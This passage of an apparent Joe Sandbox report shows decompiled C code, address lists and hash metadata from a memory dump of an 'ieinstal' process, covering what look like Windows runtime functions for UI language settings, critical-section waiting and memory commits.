											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E1ED16D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E1ED176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E1EDA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E1ED0B150();
													}
													_t116 = E1EDA6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E1ED175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1edf8638; // 0x2fc1388
																	_t122 = L1ED138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E1ED176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E1ED176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L1ED3FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L1ED170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E1ED3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E1ED3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E1ED3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E1ED3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E1ED3FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1edf7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1edf7b84 = _t75;
						_t73 = E1ED1EB70(_t134, 0x1edf7b60);
						if( *0x1edf7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E1ED1FF60( *0x1edf7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                        0x1ed3fab0
                        0x1ed3fab2
                        0x1ed3fab3
                        0x1ed3fab4
                        0x1ed3fabc
                        0x1ed3fac0
                        0x1ed3fb14
                        0x1ed3fb17
                        0x1ed3fac2
                        0x1ed3fac8
                        0x1ed3facd
                        0x1ed3fad3
                        0x1ed3fad3
                        0x1ed3fadd
                        0x1ed3fb18
                        0x1ed3fb1b
                        0x1ed3fb1d
                        0x1ed3fb1e
                        0x1ed3fb1f
                        0x1ed3fb20
                        0x1ed3fb21
                        0x1ed3fb22
                        0x1ed3fb23
                        0x1ed3fb24
                        0x1ed3fb25
                        0x1ed3fb26
                        0x1ed3fb27
                        0x1ed3fb28
                        0x1ed3fb29
                        0x1ed3fb2a
                        0x1ed3fb2b
                        0x1ed3fb2c
                        0x1ed3fb2d
                        0x1ed3fb2e
                        0x1ed3fb2f
                        0x1ed3fb3a
                        0x1ed3fb3b
                        0x1ed3fb3e
                        0x1ed3fb41
                        0x1ed3fb44
                        0x1ed3fb47
                        0x1ed3fb4a
                        0x1ed3fb4d
                        0x1ed3fb53
                        0x1ed7bdcb
                        0x1ed7bdcb
                        0x1ed3fb59
                        0x1ed3fb5b
                        0x1ed3fb5b
                        0x1ed3fb5e
                        0x1ed7bdd5
                        0x1ed7bdd8
                        0x00000000
                        0x1ed7bdda
                        0x00000000
                        0x1ed7bdda
                        0x1ed3fb64
                        0x1ed3fb64
                        0x1ed3fb64
                        0x1ed3fb67
                        0x1ed3fb6e
                        0x1ed3fb70
                        0x1ed3fb72
                        0x00000000
                        0x1ed3fb78
                        0x1ed3fb7a
                        0x1ed3fb7a
                        0x1ed3fb7d
                        0x1ed3fb80
                        0x1ed7bddf
                        0x1ed7bde1
                        0x00000000
                        0x1ed7bde3
                        0x00000000
                        0x1ed7bde3
                        0x1ed3fb86
                        0x1ed3fb86
                        0x1ed3fb86
                        0x1ed3fb8b
                        0x1ed3fb90
                        0x1ed3fb92
                        0x1ed3fb94
                        0x1ed3fb9a
                        0x1ed3fb9b
                        0x1ed3fba1
                        0x1ed7bde8
                        0x1ed7bdeb
                        0x1ed7bded
                        0x1ed7beb5
                        0x1ed7beb5
                        0x1ed7bebb
                        0x1ed7bebd
                        0x1ed7bec3
                        0x1ed7bed2
                        0x1ed7bedd
                        0x1ed7bedd
                        0x1ed7beed
                        0x00000000
                        0x1ed7bdf3
                        0x1ed7bdfe
                        0x1ed7be06
                        0x1ed7be0b
                        0x1ed7be0d
                        0x1ed7be0f
                        0x1ed7be14
                        0x1ed7be19
                        0x1ed7be20
                        0x1ed7be25
                        0x1ed7be27
                        0x1ed7be35
                        0x1ed7be39
                        0x1ed7be46
                        0x1ed7be4f
                        0x1ed7be54
                        0x1ed7be56
                        0x1ed7bef8
                        0x1ed7bef8
                        0x00000000
                        0x1ed7be5c
                        0x1ed7be5c
                        0x1ed7be60
                        0x00000000
                        0x1ed7be66
                        0x1ed7be66
                        0x1ed7be7f
                        0x1ed7be84
                        0x1ed7be87
                        0x1ed7be89
                        0x1ed7be8b
                        0x1ed7be99
                        0x1ed7be9d
                        0x1ed7bea0
                        0x1ed7beac
                        0x1ed7beaf
                        0x1ed7beb1
                        0x1ed7beb3
                        0x1ed7beb3
                        0x00000000
                        0x1ed7bea2
                        0x1ed7bea2
                        0x00000000
                        0x1ed7bea2
                        0x1ed7be8d
                        0x1ed7be8d
                        0x1ed7be92
                        0x00000000
                        0x1ed7be92
                        0x1ed7be8b
                        0x1ed7be60
                        0x1ed7be3b
                        0x1ed7be3b
                        0x1ed7be3e
                        0x00000000
                        0x1ed7be40
                        0x1ed7be40
                        0x1ed7be44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed7be44
                        0x1ed7be3e
                        0x1ed7be29
                        0x1ed7be29
                        0x00000000
                        0x1ed7be29
                        0x1ed7be27
                        0x00000000
                        0x1ed3fba7
                        0x1ed3fba7
                        0x1ed3fbab
                        0x1ed7bf02
                        0x1ed3fbb1
                        0x1ed3fbb1
                        0x1ed3fbb8
                        0x1ed3fbbd
                        0x1ed3fbbd
                        0x1ed3fbbf
                        0x1ed3fbbf
                        0x1ed3fbc5
                        0x1ed3fbcb
                        0x1ed3fbf8
                        0x1ed3fbf8
                        0x1ed3fbfa
                        0x00000000
                        0x1ed3fc00
                        0x1ed3fc00
                        0x1ed3fc03
                        0x00000000
                        0x1ed3fc09
                        0x1ed3fc09
                        0x1ed3fc0f
                        0x1ed3fc15
                        0x1ed3fc23
                        0x1ed3fc23
                        0x1ed3fc25
                        0x1ed3fc27
                        0x1ed3fc75
                        0x1ed3fc7c
                        0x1ed3fc84
                        0x00000000
                        0x1ed3fc29
                        0x1ed3fc29
                        0x1ed3fc2d
                        0x1ed3fc30
                        0x1ed7bf0f
                        0x00000000
                        0x1ed3fc36
                        0x1ed3fc38
                        0x1ed3fc3b
                        0x1ed3fc41
                        0x1ed7bf17
                        0x1ed7bf19
                        0x1ed7bf48
                        0x1ed7bf4b
                        0x00000000
                        0x1ed7bf1b
                        0x1ed7bf22
                        0x1ed7bf24
                        0x1ed7bf26
                        0x00000000
                        0x1ed7bf2c
                        0x1ed7bf37
                        0x1ed7bf39
                        0x1ed7bf3b
                        0x00000000
                        0x1ed7bf41
                        0x1ed7bf41
                        0x1ed7bf41
                        0x1ed7bf41
                        0x1ed7bf45
                        0x00000000
                        0x1ed7bf45
                        0x1ed7bf3b
                        0x1ed7bf26
                        0x00000000
                        0x1ed3fc47
                        0x1ed3fc47
                        0x1ed3fc49
                        0x1ed3fcb2
                        0x1ed3fcb4
                        0x1ed3fcb6
                        0x1ed3fcdc
                        0x1ed3fcdc
                        0x00000000
                        0x1ed3fcb8
                        0x1ed3fcc3
                        0x1ed3fcc5
                        0x1ed3fcc7
                        0x00000000
                        0x1ed3fcc9
                        0x1ed3fcc9
                        0x1ed3fccd
                        0x00000000
                        0x1ed3fccd
                        0x1ed3fcc7
                        0x00000000
                        0x1ed3fc4b
                        0x1ed3fc4b
                        0x1ed3fc4e
                        0x1ed3fc4e
                        0x1ed3fc51
                        0x1ed3fc51
                        0x1ed3fc54
                        0x1ed3fc5a
                        0x1ed3fc5c
                        0x1ed3fc5f
                        0x1ed3fc61
                        0x1ed3fc63
                        0x1ed3fc65
                        0x1ed3fc67
                        0x1ed3fc6e
                        0x1ed3fc72
                        0x1ed3fc72
                        0x1ed3fc72
                        0x1ed3fc72
                        0x1ed3fc67
                        0x1ed3fc61
                        0x00000000
                        0x1ed3fc5a
                        0x1ed3fc49
                        0x1ed3fc41
                        0x1ed3fc30
                        0x1ed3fc27
                        0x1ed3fc03
                        0x1ed3fbcd
                        0x1ed3fbd3
                        0x1ed3fbd9
                        0x1ed3fbdc
                        0x1ed3fbde
                        0x1ed3fc99
                        0x1ed3fc9b
                        0x1ed3fc9d
                        0x1ed3fcd5
                        0x1ed3fcd5
                        0x1ed3fc89
                        0x1ed3fc89
                        0x00000000
                        0x1ed3fc9f
                        0x1ed3fc9f
                        0x1ed3fca3
                        0x00000000
                        0x1ed3fca3
                        0x00000000
                        0x1ed3fbe4
                        0x1ed3fbe4
                        0x1ed3fbe4
                        0x1ed3fbe4
                        0x1ed3fbe9
                        0x1ed3fbf2
                        0x00000000
                        0x1ed3fbf2
                        0x1ed3fbde
                        0x1ed3fbcb
                        0x1ed3fbab
                        0x1ed3fc8b
                        0x1ed3fc8b
                        0x1ed3fc8c
                        0x1ed3fb80
                        0x1ed3fb72
                        0x1ed3fb5e
                        0x1ed3fc8d
                        0x1ed3fc91
                        0x1ed3fadf
                        0x1ed3fadf
                        0x1ed3fae1
                        0x1ed3fae4
                        0x1ed3fae7
                        0x1ed3faec
                        0x1ed3faf8
                        0x1ed3fb00
                        0x1ed3fb07
                        0x1ed3fb0f
                        0x1ed3fb0f
                        0x1ed3fb07
                        0x00000000
                        0x1ed3faf8
                        0x1ed3fadd

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 1ED7BE0F
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: 41f1d3bb86ee8b4771acbacc3dd6c8a5f144994f20da69a6bcc1fbe6639c3475
                        • Instruction ID: d11c347fcc40906e8dca007076d897472528cb5da9ff0f0ef547201f507d87a3
                        • Opcode Fuzzy Hash: 41f1d3bb86ee8b4771acbacc3dd6c8a5f144994f20da69a6bcc1fbe6639c3475
                        • Instruction Fuzzy Hash: D2A108B5E0064A8FD711CF65C490BEEB3A6AF44715F114BAAE986DB780DB31D881CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED02D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                        Download Yara Rule
                        C-Code - Quality: 63%
                        			E1ED02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1edf5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1edf7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E1ED497C0();
				}
				if( *0x1edf79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1edf79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E1ED31624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E1ED27D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E1ED9FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E1ED49520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E1ED3E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L1ED5DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1edf6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1edf6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E1ED49980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E1ED495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E1ED27D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E1ED27D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E1ED87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E1ED9FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1edf5350;
							if(_t109 != 0x1edf5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E1ED9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E1ED95720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                        0x1ed02d8a
                        0x1ed02d8a
                        0x1ed02d92
                        0x1ed02d96
                        0x1ed02d9e
                        0x1ed02da0
                        0x1ed02da3
                        0x1ed02da5
                        0x1ed02da8
                        0x1ed02dab
                        0x1ed02db2
                        0x1ed5f9aa
                        0x1ed5f9ab
                        0x1ed5f9ae
                        0x1ed5f9ae
                        0x1ed02db8
                        0x1ed02dc2
                        0x1ed5f9b9
                        0x1ed5f9be
                        0x1ed5f9bf
                        0x1ed5f9bf
                        0x1ed02dcf
                        0x1ed5f9c9
                        0x1ed02dd5
                        0x1ed02dd5
                        0x1ed02dd5
                        0x1ed02dde
                        0x1ed02de1
                        0x1ed02e70
                        0x1ed02e72
                        0x1ed02e72
                        0x1ed02de7
                        0x1ed02deb
                        0x1ed02e7c
                        0x1ed02e83
                        0x1ed02e85
                        0x1ed02e8b
                        0x1ed02e8d
                        0x1ed02e92
                        0x1ed02e92
                        0x1ed02e85
                        0x1ed02df1
                        0x1ed02df7
                        0x1ed02df9
                        0x1ed02df9
                        0x1ed02dfc
                        0x1ed02dff
                        0x1ed02e02
                        0x00000000
                        0x1ed02e05
                        0x1ed02e0c
                        0x1ed5f9d9
                        0x1ed02e12
                        0x1ed02e12
                        0x1ed02e12
                        0x1ed02e1a
                        0x1ed5f9e3
                        0x1ed5f9e9
                        0x1ed5f9f0
                        0x1ed5f9f6
                        0x1ed5f9f8
                        0x1ed5f9f8
                        0x1ed5f9f0
                        0x1ed02e23
                        0x1ed5fa02
                        0x1ed5fa03
                        0x1ed5fa05
                        0x1ed5fa06
                        0x00000000
                        0x1ed02e29
                        0x1ed02e29
                        0x1ed02e2e
                        0x1ed02e34
                        0x1ed02e3e
                        0x00000000
                        0x00000000
                        0x1ed02e44
                        0x1ed02e47
                        0x1ed02e4d
                        0x00000000
                        0x00000000
                        0x1ed02e4f
                        0x1ed02e54
                        0x00000000
                        0x00000000
                        0x1ed02e5a
                        0x1ed02e5f
                        0x1ed02e9a
                        0x1ed02ea4
                        0x1ed02ea5
                        0x1ed02ea8
                        0x1ed02eaf
                        0x1ed02eb2
                        0x1ed02eb5
                        0x1ed5fae9
                        0x1ed5faeb
                        0x1ed5faed
                        0x1ed5faef
                        0x1ed5faf7
                        0x1ed5faf8
                        0x1ed5fafd
                        0x1ed5faff
                        0x1ed5fb04
                        0x1ed5fb04
                        0x1ed5faff
                        0x1ed02ec0
                        0x1ed02ec4
                        0x1ed02ec6
                        0x1ed02ec8
                        0x1ed5fb14
                        0x1ed5fb18
                        0x1ed5fb1e
                        0x1ed5fb21
                        0x1ed5fb21
                        0x1ed02ece
                        0x1ed02ece
                        0x1ed02ece
                        0x1ed02ed7
                        0x1ed02e61
                        0x1ed02e63
                        0x1ed5fa6b
                        0x1ed5fa71
                        0x1ed5fa76
                        0x1ed5fa78
                        0x1ed5fa8a
                        0x1ed5fa7a
                        0x1ed5fa83
                        0x1ed5fa83
                        0x1ed5fa8f
                        0x1ed5fa91
                        0x1ed5fa97
                        0x1ed5fa9d
                        0x1ed5faa4
                        0x1ed5faaa
                        0x1ed5faaf
                        0x1ed5fab1
                        0x1ed5fac3
                        0x1ed5fab3
                        0x1ed5fabc
                        0x1ed5fabc
                        0x1ed5fac8
                        0x1ed5facb
                        0x1ed5fadf
                        0x1ed5fadf
                        0x1ed5facb
                        0x1ed5faa4
                        0x1ed5fa91
                        0x1ed02e6f
                        0x1ed02e6f
                        0x1ed02e5f
                        0x1ed5fa13
                        0x1ed5fa15
                        0x1ed5fa17
                        0x1ed5fa1f
                        0x1ed5fa21
                        0x1ed5fa22
                        0x1ed5fa25
                        0x1ed5fa28
                        0x1ed5fa2f
                        0x1ed5fa2f
                        0x1ed5fa2a
                        0x1ed5fa2a
                        0x1ed5fa2a
                        0x1ed5fa31
                        0x1ed5fa34
                        0x1ed5fa36
                        0x1ed5fa3c
                        0x1ed5fa3e
                        0x1ed5fa41
                        0x1ed5fa43
                        0x1ed5fa45
                        0x1ed5fa45
                        0x1ed5fa41
                        0x1ed5fa3c
                        0x1ed5fa4a
                        0x1ed5fa4f
                        0x1ed5fa51
                        0x1ed5fa53
                        0x1ed5fa56
                        0x1ed5fa5b
                        0x1ed5fa5e
                        0x00000000
                        0x1ed5fa5e
                        0x1ed02e23

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: 5d04a46b24b815155bd24542eb87db6c753e47607562184648821ec9b6e02410
                        • Instruction ID: 25d549d2d6419916f46e583435700c65b3db345a5aaa6567dfe1c9a6abd4757e
                        • Opcode Fuzzy Hash: 5d04a46b24b815155bd24542eb87db6c753e47607562184648821ec9b6e02410
                        • Instruction Fuzzy Hash: 95613431A01685DFDB21CB69C890B6E77F6EF40B14F1907A9E8519B3C2C734ED8187A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E1EDD0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E1EDCFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E1EDD1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E1ED49730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E1EDCA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E1EDCA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1edf8b04 >> 0x14) + (_v44 -  *0x1edf8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E1ED27D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1EDC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E1ED27D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E1EDBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1edf8724 & 0x00000008) != 0) {
